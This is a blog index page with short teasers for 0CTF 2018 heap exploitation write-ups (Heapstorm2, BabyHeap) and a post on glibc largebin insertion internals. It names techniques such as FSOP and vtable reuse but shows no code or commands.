0CTF 2018 PWN Heapstorm2 Write-up


A nice challenge to lead me revisiting the source of libc malloc. Please read my post on A Revisit to Large Bin first before reading this post.
Continue reading “0CTF 2018 PWN Heapstorm2 Write-up”


Extra Heap Exploitation 3: A Revisit to Large Bin in Glibc


In my post on allocation internal on ptmalloc, I actually miss one part of code in _int_malloc . In recent 0CTF 2018, this part of code is used to launch the exploit. Therefore, I decide to introduce this part of code in this post. In my previous posts, I only introduce how large chunks are retrieved from largebin, but I miss the part on how the freed chunks are inserted into largebin. This post will give a detailed introduction on this part.
Continue reading “Extra Heap Exploitation 3: A Revisit to Large Bin in Glibc”

0CTF 2018 PWN BabyHeap Write-up


I take this challenge as a variation of FSOP (File Stream Oriented Programming). The glibc library given in this challenge is already patched with an extra check on the validity of the vtable of fake file stream. Though I have mentioned some bypass techniques in my previous posts, I use so-called vtable reuse attack to finally get the shell.
Continue reading “0CTF 2018 PWN BabyHeap Write-up”